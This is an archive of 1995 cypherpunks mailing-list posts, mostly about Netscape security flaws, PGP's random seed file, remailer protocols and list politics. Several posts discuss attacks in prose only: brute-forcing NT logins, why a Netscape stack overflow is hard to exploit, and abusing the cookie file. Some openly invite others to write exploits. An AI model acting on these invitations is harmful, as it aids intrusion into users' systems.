# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 26 Sep 95 09:44:50 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
Message-ID: <199509261605.AA00814@october.ducktown.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RJ Harvey <harveyrj@vt.edu>
Date: Tue, 26 Sep 95 09:10:56 PDT
To: rjc@clark.net
Subject: Re: Hack Microsoft?
Message-ID: <9509261610.AA13583@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 9/26/95 EDT, Dan Bailey wrote:
>On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote:
>
>>
>>
>>   Microsoft recently got C2-security status approved for Windows NT by
>>the National Computer Security Center, a division of the NSA. They
>>are supposed to put systems through "laborious testing and review" before
>>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>>what does that say about their so-called COMSEC ability.
>>
>For fun ways to hack NT, check out http://www.somar.com/security.html.
> Some of these are really laughable.  You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.

   I don't believe that's correct; under User Manager, select
the Account option under the Policies menu item; it lets you
select whether to lock-out the account after a given number
of invalid logon attempts, and to set the number.  The main
problem here is that by default, I don't believe the 'lock out'
option is enabled (and thus, brute-force attempts at Guest
or a similar account might indeed work).

rj
---------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Tue, 26 Sep 95 09:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks press releases/contact list
Message-ID: <199509261623.AA00939@october.ducktown.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 26 Sep 95 12:41:15 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <199509261941.MAA02266@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>>data used to keep PGP secure,  Netscape will be banned from my computer
>>and every computer I am responsible for. -- For good.
>
>This is the second person who has expressed this sentiment. I don't
>understand it. If you believe that the possibility of randseed.bin
>getting out is dangerous, then why do you leave it online? Do you
>really trust every piece of software you run, every piece of software
>that can possibly access your machine over the net, to not look at
>that file?

It makes a little bit of sense - I'm not aware of any software,
other than PGP and now Netscape, that _explicitly_ goes after randseed.bin,
though of course just about anything can try.  

Assuming the code is inspectable (which it currently is), if I can
see that all it's going to do with the file is crunch it into MD5
along with a bunch of other stuff, I'm not too worried, even though
it is stealing slack(entropy) from PGP.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Tue, 26 Sep 95 17:33:57 PDT
To: uupsi7!toad.com!cypherpunks@cygnus.com
Subject: Windows MixMaster Client
Message-ID: <00996F95DAD78CE0.0000381E@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone out there have a windows mixmaster client?  (or a pointer to one?)


Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
work for me... (yes, I have the help files)

Could someone walk me through it? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 13:13:53 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
In-Reply-To: <DFIKyx.63G@sgi.sgi.com>
Message-ID: <199509261955.MAA02671@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DFIKyx.63G@sgi.sgi.com>, shamrock@netcom.com (Lucky Green) writes:

> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

This is ludicrous.  You couldn't compromise PGP's security even if you
posted the contents of randseed.bin to the net.  It's contents are
carefully sanitized before it's saved to disk and before it's used.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 26 Sep 95 13:02:28 PDT
To: andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern)
Subject: Re: getting netscape to support the remailers
In-Reply-To: <9509261951.AA01873@ch1d157nwk>
Message-ID: <199509261957.MAA20143@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



	That was what I was thinking as well. I am confused by
Netscape's java support though.. I haven't seen very many details. Is
netscape going to only support applets or can you add stuff to the
runtime as well? In order to use jcrypt one needs access to add stuff
to the runtime I beleive.

> 
> >  	I started thinking about what it would take to get Netscape
> >  to support sending mail through the remailers, after having
> >  read the S/MIME specs which Netscape 2.0 is apparently going to
> >  support. Perhaps with enough browbeating Netscape 3.0 will support
> >  the remailers.
> 
> Netscape doesn't need to support remailers explicitly since Netscape will be  
> supporting Java.  I think a remailer client is within Java's capabilities...   
> Anyone disagree?
> 
> andrew
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 26 Sep 95 12:59:40 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Easter Eggs
Message-ID: <199509261959.MAA28501@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 9/26/95 -0400, you wrote:

>I also think that in Netscape their existance is an
>indication that the managment at Netscape is a bit less uptight than
>management at some other places.

Depends on the department.  They have at least one manager at Netscape with
a permenent case of high blood preasure.  (He happens to be in charge of the
support department.)

>I didn't know about the FishCam Easter Egg, but I know that Netscape
>has a couple of Easter Eggs related to the activity indicator in the
>top right of the display.  Typically this is the Big N logo with
>animated meteors, etc. flying by when the window is active.  One
>Easter Egg temporarily turns this into a compass which spins to
>indicate activity.  Another causes the animation to show a dragon
>(Mozilla) breathing fire for the remainder of the session.  I won't
>spoil your fun by telling how to find them.

If he is not running X Windows, he is going to be searching along time for
the Compass easter egg.  You also need X windows to find the Mozilla
animated icon hack on Jammie Zawinski's page.  Which easter eggs that are
available is dependant on which client you are running.

obNetscapeHack:  There is a feature called a "cookie file" in Netscape that
is ripe for exploitation as a security leak.  If you are using a Netscape
server (and you may not even need that), you can feed all sorts of
information into it without the user's knowlege.  I have heard of one page
that overloads the cookie file until the machine runs out of drive space.  I
am sure that there are other exploitable holes there...  Any takers?
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 26 Sep 95 06:29:22 PDT
To: cypherpunks@toad.com
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <199509252300.QAA29812@infinity.c2.org>
Message-ID: <199509260102.NAA09663@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am sameer and I say ...
> > On Mon, 25 Sep 1995, John Young wrote:
> > 
> > >    The Wall Street Journal, September 25, 1995, p. B12.
> > 
> > >    Marc Andreessen, vice president of technology at Netscape,
> > >    said the company will issue fixes for the recent glitches
> > >    later this week. He added that it's unclear whether
> > >    anything other than temporarily crashing a user's computer
> > >    could result trom the recent flaw. 
> > 
> > Oh Marc, you didn't really want to say that, did you?
> > 
> > -Thomas
> 
> 	He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.

It isn't simple, you need to know the absolute address of where the
supplied code will be and alter the return address on the stack to
that address.

With NCSA HTTPD 1.3 and with fingerd (re internet worm) the stack was
always in a known state when the buffer overwrite occurred, thus the
absolute address of attacking code is static and placed at the correct
stack location.

With Netscape 1.1 the state of the stack is much more dynamic, in
particular the user can be viewing documents at an arbitary depth in
the "web tree", each recursion will increase the stack pointer (or
decrease with some architectures) There is no way of knowing for
certain where you code will end up and thus no way to reliably alter
the return address on the stack to execute your arbitary code.

You could always gamble on popular states, like when the first url
fetched by the browser.  Also you could direct execution to any
routine in the netscape binary (with unknown arguments) .  The most
detrimental offhand would be deleting the bookmarks file (whoopee) And
with Netscape 2 comming RSN I wouldn't waste too much time.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 10:09:52 PDT
To: cypherpunks@toad.com
Subject: SpokesPunking...
Message-ID: <v02120d05ac8de223a2c8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 AM 9/26/95, Craig Hubley wrote:
>"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> for commercial applications, and that Netscape seems to have taken less
> than due care to choose an appropriate random seed for its session keys."

No offense offered Craig, 'cause I like reading your stuff here, but the
concensus opinion on cypherpunks is "We don' need no steeenking
spokespunk!". It seems to me that you can say that without any title, and
the mouthier amongst us will be tapped for quotes as individuals anyway...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 26 Sep 95 13:49:34 PDT
To: cypherpunks@toad.com
Subject: Netscape Stock Prices
Message-ID: <199509262045.NAA05438@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's the history of Netscape's stock price to date, with the dates of
some Cypherpunk exploits, the Wall Street Journal Articles about them,
and major Netscape press releases.


Date     High     Low   Close   Volume 

950809	75.000	53.750	55.500	3851.8
950810	56.500	51.375	51.375	2795.9	
950811	53.000	48.750	51.500	1907.4	
950814	51.750	50.250	51.250  530.9	
950815	55.250	51.250	54.625	1040.6	  Damien's Crack - AT&T deal
950816	56.500	55.250	55.625	997.6	  Developer's Partnership announced
950817	55.250	52.500	54.875	562.5	  WSJ article re: Damien
950818	55.250	52.250	52.625	409.5	
950821	52.750	51.000	51.000	290.0	
950822	51.500	50.500	50.625	258.5	  Win95 Navigator released
950823	53.500	50.500	52.000	414.2	
950824	52.000	51.250	51.250	119.7	
950825	52.000	51.250	51.250	89.2	
950826                                    Brute Crack
950828	51.750	51.000	51.000	210.2	  
950829	51.250	46.750	48.250	1037.9	
950830	48.500	46.000	46.625	319.3	
950831	49.500	45.750	49.500	423.0	
950901	49.500	47.750	48.750	164.4	
950905	49.250	46.000	46.250	277.8	
950906	49.500	47.250	48.750	351.9	
950907	50.750	48.750	50.250	499.1	
950908	51.000	50.000	50.250	147.6	
950911  54.750  50.250  53.250  533.7
950912  54.500  51.000  52.250  211.5
950913  52.750  50.000  50.750  150.8
950914  51.250  50.250  50.250  79.9
950915  53.750  50.250  53.250  242.1   
950917                                    Ian & Dave's Crack       
950918  55.250  51.750  52.500  350.1     New Software Announced
950919  53.250  49.000  53.375  373.5     WSJ article re: Ian & Dave
950920  56.250  53.250  54.750  302.5
950921  59.125  54.250  58.750  436.9     Collabra Purchase Announced
950922  63.250  59.750  62.750  807.7     Ray's overflow bug 
950925  69.000  62.250  67.000  684.0     WSJ article re: overflow bug

Stock prices from MIT's stock price history server and the Wall Street Journal.
Cypherpunk dates from Sameer's Hack Netscape Page (not sure when Ray posted).
Press anouncement dates from Netscape's home page.
Any typos or mistakes from me.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 26 Sep 95 11:06:56 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: getting netscape to support the remailers
In-Reply-To: <199509260239.TAA14898@infinity.c2.org>
Message-ID: <9509261805.AA22239@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


sameer writes:
> 	I think that in order to get netscape to support the remailers
> the remailers will have to:
> 
> A) Support S/MIME
> B) Have a documented protocol, MIME-related
> 
> 	Did Ray Cromwell do some work towards MIMEifiying the
> remailers? My impression of his work back when he posted was that it
> trusted the remailers too much, but perhaps my memory is flawed-- in
> any case his work may be helpful towards developing a remailer
> standard, which could then help get support incorporated into
> MIME agents.

Here's something I sent to the list on July 24 which may be of interest:

---- begin included message ----

Perry Metzger writes:
>>> It would be very, very good if everyone doing secure mail systems of
>>> one sort or another (including PGP integrated mail packages and
>>> remailers) slowly moved forward to the formats described in this
>>> document, which is now a proposed internet standard...

The IESG writes:
> The IESG has approved the following two Internet-Drafts as Proposed
> Standards:
> 
> 1. MIME Object Security Services <draft-ietf-pem-mime-08.txt>
> 2. Security Multiparts for MIME: Multipart/Signed and
> Multipart/Encrypted
> <draft-ietf-pem-sigenc-03.txt>
> 
> These documents are the product of the Privacy-Enhanced Electronic Mail
> Working Group. The IESG contact person is Jeffrey Schiller.
> 
> 
> Technical Summary
> 
> These documents describe a general framework for security within MIME
> (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering
> Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt).
> Support is provided for digital signatures on MIME objects (both simple
> and compound) as well as for confidentiality provided through data
> encryption.

I've spent some time reading these proposed standards, along with parts of
RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to
get a sanity check and comments before I consider proceeding with submission
to the IETF Media Types review list, etc.

I propose a new Media Type subtype for Mixmaster remailer packets,
"application/mixmaster". (For the purposes of this message, "Mixmaster
remailer packet" refers to a packet generated by a Mixmaster server or client,
and intended for transmission to a Mixmaster server. It does *not* cover
messages generated by a Mixmaster server that are intended for an ultimate
message recipient.) This is intended to be an experimental protocol
for use in the control part of a multipart/encrypted message. 

There is one required parameter, "version", meant to indicate the version
number of the originating Mixmaster software. In addition, one optional
parameter, "key-id", may be included. If present, this parameter would
indicate the single line key prefix/ID of the public Mix key used to
encrypt (at the outermost layer) the contents of the application/mixmaster
part. This might be used to thoroughly disambiguate decryption options in
the event that the recipient server has more than one currently active
public Mix keys.

The application/mixmaster (control) part of the multipart/encrypted message 
would contain the padded list of Mixmaster server hop headers, superencrypted 
at the outermost layer with a public Mix key (presumably, one belonging to the
recipient server). A single decryption of these headers should reveal the
IDEA key used to superencrypt, at the outermost layer, the body part of the
multipart/encrypted message. The application/octet-stream (body) part of the
multipart/encrypted message would contain the list of ultimate recipients of
the remailed message, the text of the message itself, and any additional 
processing instructions to the final Mix server. The latter, body part of
the multipart/encrypted message shall have been encrypted by the originator
using the IDEA key specified in the former, control part.

The contents of the application/mixmaster part should be encoded in
accordance with the standards for application/octet-stream.

(NB: this amounts to a division of the extant Mixmaster packet format 
roughly into a control section and a body ("payload") section.)

Comments ?

-Futplex <futplex@pseudonym.com>

---- end included message ----

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 26 Sep 95 14:07:26 PDT
To: cypherpunks@toad.com
Subject: [More NOISE] Re: Netscape for OS/2, when? (Re: Another Netscape Bug)
Message-ID: <199509262107.OAA19327@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 9/26/95 EDT, Sentiono Leowinata wrote:

>I wish Netscape will port it to OS/2 (already ask them, but no comment
>from Netscape). I don't try it on Netscape 1.1N as it doesn't run
>reliably under Win-OS/2 (10 min -> crash! ;)

According to Netscape they will *NEVER* support OS/2.  (They have made the
statement a number of times.)  They seem to think that OS/2 will never
amount to much.  (They may be right...)
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Tue, 26 Sep 95 14:33:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Security Update news release
In-Reply-To: <9509251617.ZM167@tofuhut>
Message-ID: <9509261428.ZM150@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure,  Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

  Rather than get into a big fight about how safe it is for netscape
to be reading PGPs randseed.bin file, I've changed our code to not
do it.  Instead of reading ~/.pgp/randseed.bin, we now get the name
of a file from the environment variable NSRANDFILE, and pass that
file's contents throught the RNG seed hash.  If you decide that its
safe, you can set the env variable to point to your randseed.bin file,
or any other file of random bits you care to use.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 26 Sep 95 15:09:57 PDT
To: hshubs@BIX.com
Subject: Re: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID: <199509262133.OAA21492@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?  

Hi,
Eric here.  I publish Cypherpunks Lite.  What can I do for you?

Let me know if you have any other questions.

Eric

Here's my standard blurb:
----------------
Thanks for your interest in Cypherpunks Lite.

I provide a moderated version of the Cypherpunks list called
"Cypherpunks Lite".  A one year subscription costs US$20 and is
payable by check or money order to "COMSEC Partners". Cypherpunks Lite
is available in either individual messages or a more-or-less daily
message digest.  The content of both are the same.  In either case, I
forward approximately 5 - 10% of the total Cypherpunks feed.  This
works out to about 5 - 10 messages / day.

To take a look at what you can expect there is an archive of the previous
selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite.
The files with the extension .gz are compressed using gzip.

If you would like to subscribe, please send payment to:

	COMSEC Partners
	1275 Fourth Street, Suite 194
	Santa Rosa, CA 95404 USA

Be sure to provide the email address you want us to use, as well as
indicating your preference for individual messages or the digest.

Thanks again,
Eric Blossom








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 26 Sep 95 14:45:12 PDT
To: cypherpunks@toad.com
Subject: cypherpunk press releases vs. FAQ
In-Reply-To: <ac8d6cee030210045390@[205.199.118.202]>
Message-ID: <199509262141.OAA24578@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


earlier I advocated a press release mechanism, and this is getting
flamed to smithereens by the more libertarian/cryptoanarchists
elements of the group, as I predicted (but geez, accusing me
of *deliberately* trying to start a flamewar here really hurts
my feelings! if I were really that mischievous, the meager return would
be quite an insult to my expertise.. <g>).

however this is entirely a matter of phasing of the question.
I am *not* advocating that someone be elected the spokesman, that
everyone agrees on what he says, that we all agree it is our
"official representation" etc. and I thought I made this clear.
(oops, I used that "we" word again, my humble apologies. just pretend
that I'm talking to my tentacles if you object.)
I do believe these are valuable attributes of groups and can 
help knit cohesion and help determine meaningful agenda 
(people here sometimes complain about the lack of focus or
of conquest, and do you need any clue as to *why* there is a lack
of this?) but I will not promote it where it is not relevant (or
at leas, not welcomed).

what I had in mind was a more FAQ-like cypherpunks document, with a
list of who considers themself a cypherpunks contributer, or just
someone who is willing to be a listed expert on a topic for media
inquiries. all the time, someone just sits down and writes a FAQ for 
a newsgroup, yet there was no "official" appointment.

if a FAQ is continually updated, it becomes very much like a press release. 
a question on the list might be, "what exactly did the cypherpunks discover 
about netscape? what is the seriousness of this flaw?" etc.  in this way the 
questions become virtually identical to what the media would inquire. and in
a sense every newsgroup's FAQ is almost like a "press release" for
everyone in the newsgroup. but this also shows why a FAQ is almost invariably
*extremely* time consuming and a herculean task to compile/update involving
huge numbers of man-hours the refined, final product does not convey.

I am advocating that individuals here come up with a FAQ. there are excellent
web sites, but not a simple FAQ of this group. I also encourage competing
FAQs at first. this happens all the time in newsgroups, and they eventually
merge or cover different topics.

the FAQ topic has been discussed here often, and everyone agrees it 
is a pretty good idea, and someone should "just do it" if they want to.
I guess what I'm pointing out (beyond the usual noise on the subject)
is that if anyone wants to have cypherpunk
press releases, that energy is better channelled into a FAQ. it is a
definite vacuum that would beneficially be filled, IMHO. (the TCM 
cyphernomicon, while admirable, is not really a FAQ imho..)

I am *not* advocating that (or rather, I say that we *should not*) 
vote on a FAQ writer, decide what is the *official* FAQ for the group 
if there are competing ones, bar or *discourage* some people from 
creating a FAQ, etc.

what I want to point out is that the FAQ is a model by which a 
very anarchic group of people can come to a definite document by
which they communicate their "findings" and their concerns, and
everything else that occupies their brains daily. this happens
through the FAQ writer as a conduit. in a sense, the FAQ writer
is the unappointed "spokesman" for the group. he wins approval
through the gradual process of people using the document and not
through any other means.

another alternative that actually seems to be enjoying some success
is for individual cypherpunks to issue press releases pertaining to 
their own specialty. i.e., "so-and-so at company X announced that
they would be doing so-and-so in conjunction with the cypherpunks".
again, how can anyone object to this if there really is no such
thing as a "cypherpunk group"? their press release certainly can't
be in conflict with something that doesn't exist.

the sword cuts both ways, although the rabid elements on this list 
would rather not admit it: if no one is a cypherpunk, if there is
no "official" goal or leader, if the term is not owned by anyone,
then anyone can define "cypherpunk" to be anything they want, and 
do anything they like under that title. as soon as you say, "well,
they're not a cypherpunk if so-and-so", well, your pretty much violating
your own premise: that there is no such thing as a "cypherpunks group"
or "official agenda".

it seems to me that the opposition to group organizing etc. in this
group is related to something else: the idea that the most valuable
conquests come from individual tinkerers who are not part of any
"group", who pursue their own ideas at the ignorance or hostility of
the rest of "society" (another cypherpunk 4-letter word, of course).

this is related to the idea of doing things in secret, too. "the most
valuable projects are those that are kept secret, pursued by only one
or a few, and then unleashed on the world all at once." these are 
interesting and enticing ideas, and I don't deny them to some degree
(there are many famous historical examples, such as arguably Tesla,
Ramanujan, Fermat, Archimedes, etc.), but it is also true, IMHO, that 
there are certain things that cannot be accomplished
without a certain degree of organization and cooperation among many
elements.. (well, again a cryptoanarchist heresy, but hell, I'm pretty
good at those). but fortunately a FAQ does not require the latter, although
it can benefit immensely from it (the sci.crypt FAQ has a group of
collaborating writers, as to many other FAQs).


--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 26 Sep 95 12:56:19 PDT
To: sameer <sameer@c2.org>
Subject: Re: getting netscape to support the remailers
Message-ID: <9509261951.AA01873@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  	I started thinking about what it would take to get Netscape
>  to support sending mail through the remailers, after having
>  read the S/MIME specs which Netscape 2.0 is apparently going to
>  support. Perhaps with enough browbeating Netscape 3.0 will support
>  the remailers.

Netscape doesn't need to support remailers explicitly since Netscape will be  
supporting Java.  I think a remailer client is within Java's capabilities...   
Anyone disagree?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 26 Sep 95 15:25:03 PDT
To: stewarts@ix.netcom.com
Subject: Re: The Fortezza random number generator is not trustworthy
In-Reply-To: <199509232254.PAA11243@ix8.ix.netcom.com>
Message-ID: <199509262156.OAA21527@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


> On a technical note, I would have thought that Fortezza and/or CAPSTONE used
> some sort of hardware RNG, i.e. noisy Zener diodes or whatever.  I've seen it
> mentioned on this list that some other NSA secure phones, such as STU-III,
> do that.

I was under the impression that a seed for the RNG is loaded into the
Fortezza at initialization time.  This would make me think that they
are using a cryptographically strong PRNG.  This would give data that
appears random, but is completely determined by the initial state.

I suspect that the "seed keys" provided by the two agencies used to
program the Clipper chips has the same properties.  This makes the
question about how does the NSA get access to the key escrow database
moot.  They don't need access.  They know a priori all the unit keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 26 Sep 95 12:42:27 PDT
To: jirib@cs.monash.edu.au
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <199509250402.OAA17312@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9509261538.C922-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




While it is true that on some versions of X you can watch mouse events on
other peoples computers, it is also true that on some versions you can
watch keyboard input.  At CMU Bennet Yee wrote a program to get peoples
passwords as they typed them in using X's poor/non-existent security back
then.  This was before xauth. 

I still think that the low bits of the mouses X and Y positions as the
user moves the mouse around the screen are a very good source of random
bits for Netscape.

   --  Vince




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Tue, 26 Sep 95 12:41:58 PDT
To: ietf-payments@cc.bellcore.com
Subject: First Payments WG Meeting Announcement
Message-ID: <9509261941.AA17884@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain

The World Wide Web Consortium is holding a Workshop on payments. The workshop
is intended to be a small, technically oriented meeting of its payments working
group. Although it is a members only event I am willing to listen to special
pleading, alternatively companies may wish to join the consortium at our
extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
details.

-- 
Phillip M. Hallam-Baker            Not speaking for anoyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!


ANNOUNCE: First W3C Payments WG Meeting, October 11

----------------------------------------------------------------------------

What: 1st W3C Payment WG Meeting

Where: MIT EECS, Grier Room 34-401 (subject to change)

When: Wednesday October 11, 9am - 5pm

Who: W3C Member Representatives ONLY

URL: First W3C Payments WG Meeting

W3C is making progress on supporting electronic payments on the web. This WG
Meeting has been called to foster discussion and feedback between W3C and
its members. Discussion will focus on proposals to the W3C for payment
protocols, interfaces, and e-commerce support.

The agenda for the electronic payment workshop is still being settled. At
the current time we have confirmed presentations by VISA, IBM, W3C, and the
Financial Services Technical Consortium (FSTC). Additional invitations have
been issued, and suggestions for additional presentations would be welcome.
Contact Phillip Hallam-Baker (hallam@w3.org) or Jim Miller (JMiller@w3.org)
with suggestions.

There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th.
Contact Rohit Khare for details (khare@w3.org)

To RSVP for the Payments WG Meeting, email the coordinator, Phillip
Hallam-Baker (hallam@w3.org) or call 617/258-5967 by 5 October. This
workshop is aimed at technologists; please include a brief description of
any relevant payments work you or your organization are involved in.

This is a preliminary announcement of the date and time only. We have
arranged for hotel rooms at the Kendall Square Mariott. To qualify for the
MIT discount, notify Susan Hardy (susan@w3.org).

For a review of the Consortium's plans, see W3C's report on Electronic
Payment Schemes and the Third W3C Security Workshop.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Tue, 26 Sep 95 14:56:32 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: RE: `Random' seed.
Message-ID: <30687693@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze <mab@crypto.com> wrote:

>Here's my current favorite quick-and-dirty true-random-in-software 
generator.
>Use at own risk and read the comments carefully...
[...]
> *      Physically random numbers (very nearly uniform)
> *      D. P. Mitchell
> *      Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated.  In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the 
expected entropy in the form of testable assumptions.  A first step in this 
direction is to provide the entropy series used to arrive at the 16 bit per 
32 bit word estimate.  The second step, as I recommended last week (RE: RNG 
Resource FAQ... on 9/22), is to provide a concise argument drawn directly 
from the mathematical weaknesses of the entropy series.  In that post, I 
posed the following four criteria because they address the mathematical 
(theoretical) weaknesses of the entropy series, while using a vocabulary 
that should be sensible to a rigorous designer:

1)  The states exist and can be identified.
2)  The number of states n is known.
3)  The index value i uniquely identifies a state.
4)  The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a 
_concise_ statement of the criteria under which the series is defined (i.e. 
when the 4 mathematical weaknesses have been appropriately addressed), and 
the argument "why" has been scrutinized against the code or proposed design.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
